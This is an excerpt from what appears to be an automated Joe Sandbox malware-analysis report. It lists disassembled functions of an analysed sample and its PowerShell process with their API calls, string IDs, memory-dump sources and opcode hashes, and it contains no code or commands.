                                                      Function 00405F9D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00403141,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405FA3
                                                      • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00403141,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405FB3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: CharPrevlstrlen
                                                      • String ID: C:\Users\user\Desktop
                                                      • API String ID: 2709904686-224404859
                                                      • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                      • Instruction ID: 76a3089014cba6cdede5e63107dce03d3cc6699033e3804c636830b34c248568
                                                      • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                      • Instruction Fuzzy Hash: D1D05EB2401921DAE3126B04DD00D9F63ACEF12300746482AE840E7161D77C5C8186AD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004060D7 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E7
                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 004060FF
                                                      • CharNextA.USER32(00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406110
                                                      • lstrlenA.KERNEL32(00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406119
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                      • String ID:
                                                      • API String ID: 190613189-0
                                                      • Opcode ID: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
                                                      • Instruction ID: 41d5ee4ea83cc4d308be6584820b02a87ee89e19241337121ce36a8d52a16fb8
                                                      • Opcode Fuzzy Hash: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
                                                      • Instruction Fuzzy Hash: 9DF06235504418EFC702DBA9DD00D9EBFA8EF46350B2640B9E841FB211DA74DE11AB99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Executed Functions

                                                      Function 0745BB58 Relevance: 56.7, Strings: 44, Instructions: 1706COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$4'kq$4'kq$4'kq$4'kq$4'kq$4rl$4rl$tLgk$tLgk$tLgk$tLgk$x.fk$x.fk$x.fk$-fk$-fk
                                                      • API String ID: 0-4025161208
                                                      • Opcode ID: 0f1f935e7eee01064f771c546811b6bf7d9a41b1a81e9c59c89bd1d1f7e8adaa
                                                      • Instruction ID: 80d8e6a07ff3b48fa5bad33a4424e6c233a26802065eee63184494a06600e78c
                                                      • Opcode Fuzzy Hash: 0f1f935e7eee01064f771c546811b6bf7d9a41b1a81e9c59c89bd1d1f7e8adaa
                                                      • Instruction Fuzzy Hash: CCF24FB4A00219DFDB64DB54CD90BDAB7B2FF89304F1085AAD909AB751CB31AE81CF51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0491F000 Relevance: .3, Instructions: 281COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2194295382.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_4910000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e7401fa50f4b8b56ccd6f37c64d134ccb140b482a7e8b81c00698228589a28b7
                                                      • Instruction ID: 84b43cfa70bd43d272966bb19d89610954d9d3bf83189a39a038d1fb87821827
                                                      • Opcode Fuzzy Hash: e7401fa50f4b8b56ccd6f37c64d134ccb140b482a7e8b81c00698228589a28b7
                                                      • Instruction Fuzzy Hash: 9AB16B70E0020DDFDF14CFA9D98579DBBF6AF88354F148539D815AB268EB34A842CB81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0491EFF4 Relevance: .3, Instructions: 279COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2194295382.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_4910000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2a202e83089867f1adbbde887f5e44ee86673639fcb0ddcf9e4bacfd604d6b72
                                                      • Instruction ID: 30964472c4c286a6e736bb6c258c1f685f322dec4504f462e8701cd77effe52e
                                                      • Opcode Fuzzy Hash: 2a202e83089867f1adbbde887f5e44ee86673639fcb0ddcf9e4bacfd604d6b72
                                                      • Instruction Fuzzy Hash: 69B14B70E0020DDFDB10CFA9D98579DBBF6BF88354F148539D815A7268EB34A946CB81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0491F8D0 Relevance: .3, Instructions: 266COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2194295382.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_4910000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a1941962cb42a4c366a937623c873c50e4714c3e585572e68e204d8cb6da082e
                                                      • Instruction ID: ad728422b818cfe95d57e4478287a35b9aa0f34a9063b3eb28021e59f723f42d
                                                      • Opcode Fuzzy Hash: a1941962cb42a4c366a937623c873c50e4714c3e585572e68e204d8cb6da082e
                                                      • Instruction Fuzzy Hash: 45B17E70E0020DDFDB10CFA9C99579DBBF6AF88314F148539D819EB268EB74A845CB81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0745C7A9 Relevance: 36.1, Strings: 28, Instructions: 1096COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$4'kq$4'kq$4'kq$tLgk$tLgk$x.fk$x.fk$-fk$-fk
                                                      • API String ID: 0-1113529463
                                                      • Opcode ID: 382907f785646447f8964c583b152661d857b7778a79d72825445aa281f882b5
                                                      • Instruction ID: d6ab15c396b4488a7f829f5bd896cb2d5df20232962076e1d75df7338e93a99e
                                                      • Opcode Fuzzy Hash: 382907f785646447f8964c583b152661d857b7778a79d72825445aa281f882b5
                                                      • Instruction Fuzzy Hash: 23B250B4A013149FCB64DB64CD95BDAB7B2FF89304F1085AAD8096B751CB31AE81CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 074540D8 Relevance: 28.3, Strings: 22, Instructions: 804COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$4'kq$tLgk$x.fk$-fk
                                                      • API String ID: 0-113696938
                                                      • Opcode ID: 377c0a12a27c522125df55ebfa427f95bcc9296b09fe067ad903c31571012538
                                                      • Instruction ID: a39aa2bc8c5a8d17d74fdb82706aef4be04e9c9c812cf4ab3d9ba0fd18532e9d
                                                      • Opcode Fuzzy Hash: 377c0a12a27c522125df55ebfa427f95bcc9296b09fe067ad903c31571012538
                                                      • Instruction Fuzzy Hash: 747280B0A00214DFDB24DF68C950FAAB7B2EF85304F5085AAD959AF741CB31AD85CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07453651 Relevance: 20.7, Strings: 16, Instructions: 686COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$4'kq$4'kq$x.fk$-fk
                                                      • API String ID: 0-2445202783
                                                      • Opcode ID: 4da12a8872e8b4feae84621dc1b7fb1aa6b7d0cc3773f5a7de64c793fd83901a
                                                      • Instruction ID: dde3cde72652b55eb62869ba5ce2e26470497e3d4f1ba064a5902f7af1cc62ac
                                                      • Opcode Fuzzy Hash: 4da12a8872e8b4feae84621dc1b7fb1aa6b7d0cc3773f5a7de64c793fd83901a
                                                      • Instruction Fuzzy Hash: 5652B2B0A00214DFDB24DF68C950BAAB7B2EF85304F5085AAD9096F751CB32ED85CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0745C9C1 Relevance: 16.8, Strings: 13, Instructions: 558COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$4'kq$4rl$tLgk$tLgk$x.fk
                                                      • API String ID: 0-2523537002
                                                      • Opcode ID: 900b796625e2436d455ae5b21a705561b539b9a5cb379d373f4441e4e20c65c9
                                                      • Instruction ID: 7e237036124ece69f0dcb4377e72223c695493b880f6bb9b7c977b1d71e2b7b5
                                                      • Opcode Fuzzy Hash: 900b796625e2436d455ae5b21a705561b539b9a5cb379d373f4441e4e20c65c9
                                                      • Instruction Fuzzy Hash: FC424CB4A00315DFDB64DB24C994BEAB7B2FF45304F1084AAD909AB751CB71AE82CF51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07454292 Relevance: 15.6, Strings: 12, Instructions: 561COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$4'kq$x.fk$-fk
                                                      • API String ID: 0-3528880643
                                                      • Opcode ID: 433d1bd4aec197b0aa00e8b7a37ca58ac2e57591d7fd4f2821b590b4bbc27943
                                                      • Instruction ID: b4e507af987af2afefc8e853bc72a2c06da533c396e7f04a7aef7719889b812c
                                                      • Opcode Fuzzy Hash: 433d1bd4aec197b0aa00e8b7a37ca58ac2e57591d7fd4f2821b590b4bbc27943
                                                      • Instruction Fuzzy Hash: 95329FB0A00214DFDB24DF68C950FAAB7B2FF85304F5085AAD9596B741CB32AD85CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0745C975 Relevance: 15.5, Strings: 12, Instructions: 537COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$4'kq$x.fk$-fk
                                                      • API String ID: 0-3528880643
                                                      • Opcode ID: 71c3fe9141553402c76157c8ab397ffc792dd34e507665735e826d1ca0f05a62
                                                      • Instruction ID: 0176ae24cd0888e01bba5e4abda0aace88ac903fb62090ec2efd308f9272f411
                                                      • Opcode Fuzzy Hash: 71c3fe9141553402c76157c8ab397ffc792dd34e507665735e826d1ca0f05a62
                                                      • Instruction Fuzzy Hash: 12325EB4A013199FCB24DB54CD90B9AB7B2BB89304F1085AAD9496F751CB31AE81CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0745CC08 Relevance: 11.7, Strings: 9, Instructions: 435COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (ful$(ful$(ful$(ful$(ful$4'kq$4rl$tLgk$x.fk
                                                      • API String ID: 0-1145424364
                                                      • Opcode ID: 22a90f3d63c1b9f08c0f9210f09f08ef106b79d6d61c41d81db26a95a6e33838
                                                      • Instruction ID: a45183722a82ca75d5a931b58d6fe2b121deeae7ec4b3564a5cb847468be5562
                                                      • Opcode Fuzzy Hash: 22a90f3d63c1b9f08c0f9210f09f08ef106b79d6d61c41d81db26a95a6e33838
                                                      • Instruction Fuzzy Hash: DA122EB4A01315DFDB64CB24C990BDAB7B2FF45304F1084AAD949AB751CB71AD82CF51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07455020 Relevance: 10.4, Strings: 8, Instructions: 373COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (ful$(ful$4'kq$4'kq$4'kq$4'kq$x.fk$-fk
                                                      • API String ID: 0-1258633638
                                                      • Opcode ID: da73a9af0473ab68903e4694a79fa758bcf6479b6a32bc14bff892bf9467b336
                                                      • Instruction ID: 42b94727ba44eb36da13df6fc992804a480241f29e8ff49458a200800af3b51e
                                                      • Opcode Fuzzy Hash: da73a9af0473ab68903e4694a79fa758bcf6479b6a32bc14bff892bf9467b336
                                                      • Instruction Fuzzy Hash: 2BE190B0A402059FDB14DB68C541BAFBBB3AF88304F14C869D8056F396CF76ED568B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07450778 Relevance: 6.8, Strings: 5, Instructions: 588COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'kq$4'kq$$kq$$kq$$kq
                                                      • API String ID: 0-1023320533
                                                      • Opcode ID: 763a710ac9419c031408d79af2643b02bd35cfedc2f7b125607981b943ba0972
                                                      • Instruction ID: e5cc8b635e66f1274acc5b3e56e56090e1a2d16a1bc781dd3084107ebf135fe9
                                                      • Opcode Fuzzy Hash: 763a710ac9419c031408d79af2643b02bd35cfedc2f7b125607981b943ba0972
                                                      • Instruction Fuzzy Hash: B21226B97042069FDB258B7994506ABBBE2AFC6310F28C46BD805CB363DB35DC45C7A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07454FF0 Relevance: 6.6, Strings: 5, Instructions: 314COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (ful$4'kq$4'kq$x.fk$-fk
                                                      • API String ID: 0-1075056351
                                                      • Opcode ID: 1e2a3e1c98ca20b405066ab0a9bb5b79fa1401bffd2352dbda68a86f4528a2be
                                                      • Instruction ID: 22f1f63bd2acb9fc47bc5866304d42a7e9afdee73e52a78c5fc403b8917acf87
                                                      • Opcode Fuzzy Hash: 1e2a3e1c98ca20b405066ab0a9bb5b79fa1401bffd2352dbda68a86f4528a2be
                                                      • Instruction Fuzzy Hash: 92C1BFB0A00205DFDB14CB54C541BAEFBB3AF89304F15C46AE8056F3A6CB75E956CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07454600 Relevance: 5.7, Strings: 4, Instructions: 680COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (ful$(ful$(ful$(ful
                                                      • API String ID: 0-100295639
                                                      • Opcode ID: 9715daf8facfcd4219bf23b3b501b5831ff36adf533d12dcbac18e465177faac
                                                      • Instruction ID: 722a65d5d687c2b54918c8da3df64bab1e3d5e437d2180a65fe950667aee2231
                                                      • Opcode Fuzzy Hash: 9715daf8facfcd4219bf23b3b501b5831ff36adf533d12dcbac18e465177faac
                                                      • Instruction Fuzzy Hash: 3F524DB4B00245DFD714CF98D941AAABBB2EF85314F15C16AE8059F756CB72EC82CB81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07457DE8 Relevance: 5.5, Strings: 4, Instructions: 540COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'kq$4'kq$4'kq$4'kq
                                                      • API String ID: 0-1293621312
                                                      • Opcode ID: b39f8d4f2f422ed4c677e844273d45362ae31972e6a3ee5c5ce3ebff58b6474d
                                                      • Instruction ID: 040cdb92b4069ddd897276f035e1b4bdd459a652723a96983a805d3bed825a57
                                                      • Opcode Fuzzy Hash: b39f8d4f2f422ed4c677e844273d45362ae31972e6a3ee5c5ce3ebff58b6474d
                                                      • Instruction Fuzzy Hash: 1C0237B1B042058FCB158B6998116ABBBE6AFC1210F2484BBDD05CB397DF36DC56C7A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0491B910 Relevance: 4.3, Strings: 3, Instructions: 519COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2194295382.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_4910000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Hoq$$kq$$kq
                                                      • API String ID: 0-2950107677
                                                      • Opcode ID: bf82b7ea60ae3a7b9464512bef1b066b309e9b9de1a3613f8dfd52097818dc5a
                                                      • Instruction ID: 70164546cd814e233df816820f034f238e0dfb34dd8cc0bd71c30ea13a7d1d5e
                                                      • Opcode Fuzzy Hash: bf82b7ea60ae3a7b9464512bef1b066b309e9b9de1a3613f8dfd52097818dc5a
                                                      • Instruction Fuzzy Hash: 552231347002289FDB25DB24D8557AEBBB6BF89304F1444A9D40AAB365DF35EE85CF80
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07451518 Relevance: 3.8, Strings: 3, Instructions: 94COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $kq$$kq$$kq
                                                      • API String ID: 0-2086306503
                                                      • Opcode ID: 079166e4592a8d1ab2d01b14b98165e163c0cb76c0942cc9b484b188716e2b7f
                                                      • Instruction ID: d33396019a938016c6c8226264491a2394d39c240f90ae37e7a9f1b0f4da6748
                                                      • Opcode Fuzzy Hash: 079166e4592a8d1ab2d01b14b98165e163c0cb76c0942cc9b484b188716e2b7f
                                                      • Instruction Fuzzy Hash: 74213BB131420E6BDB3859BE98017A7B6D79BC1710F65883BAD06CB383DD39D8458761
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07451640 Relevance: 3.0, Strings: 2, Instructions: 477COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (ful$(ful
                                                      • API String ID: 0-51623107
                                                      • Opcode ID: 2571abd4ca185bcab89d9b3fbe5eb01aecf4450a0083a03fb8add13447fa498b
                                                      • Instruction ID: d77fe79f81a8d8e5dcad609a80d9cee0e211c964c64d66fe44fa0e03c0e0e80b
                                                      • Opcode Fuzzy Hash: 2571abd4ca185bcab89d9b3fbe5eb01aecf4450a0083a03fb8add13447fa498b
                                                      • Instruction Fuzzy Hash: 03127EB4B002099FD714CB98D551FAABBF2AF89314F14C16AD8199F756CB32EC42CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07454C7C Relevance: 3.0, Strings: 2, Instructions: 465COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (ful$(ful
                                                      • API String ID: 0-51623107
                                                      • Opcode ID: b3a79aa90366cb814d294521ed45d60eb1152c850cf1e46b65fbd69f0641272b
                                                      • Instruction ID: 53ac8e210ac12df6f05759a7500694b2e6a9184d26f740ead10097ded388fbda
                                                      • Opcode Fuzzy Hash: b3a79aa90366cb814d294521ed45d60eb1152c850cf1e46b65fbd69f0641272b
                                                      • Instruction Fuzzy Hash: C21249B5A00245DFDB14CF98C941EAABBB2EF85314F15C16AE9055F762CB72EC82CB41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07451B0E Relevance: 2.9, Strings: 2, Instructions: 422COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (ful$h2hk
                                                      • API String ID: 0-2461700909
                                                      • Opcode ID: e56e7c5523cbd8616a2fa232ef10028da71ce945b8a683649a39f4ba1ded085b
                                                      • Instruction ID: ea0d703c65cfc2d817d2fdf5aca505045dbb83e4e5a4042ea489336005820cfe
                                                      • Opcode Fuzzy Hash: e56e7c5523cbd8616a2fa232ef10028da71ce945b8a683649a39f4ba1ded085b
                                                      • Instruction Fuzzy Hash: D50248B4A00209DFDB14CF58C551FAABBB2EF89314F15C16AE9059B356CB72EC42CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 074514F8 Relevance: 2.6, Strings: 2, Instructions: 83COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $kq$$kq
                                                      • API String ID: 0-3550614674
                                                      • Opcode ID: 9e84b409c96fed6a75285195cb75cda29dce8f5461b27e6000dfcbf7d1b54c69
                                                      • Instruction ID: bef5172e9585b124aaeb8c39695b186c236d5d342e575f4d144aa771e721e4d8
                                                      • Opcode Fuzzy Hash: 9e84b409c96fed6a75285195cb75cda29dce8f5461b27e6000dfcbf7d1b54c69
                                                      • Instruction Fuzzy Hash: C8213BF121838D2FDB32097988117E37FA54F82750F6A4467ED45CB393D9399944C761
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 074545FF Relevance: 1.7, Strings: 1, Instructions: 494COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
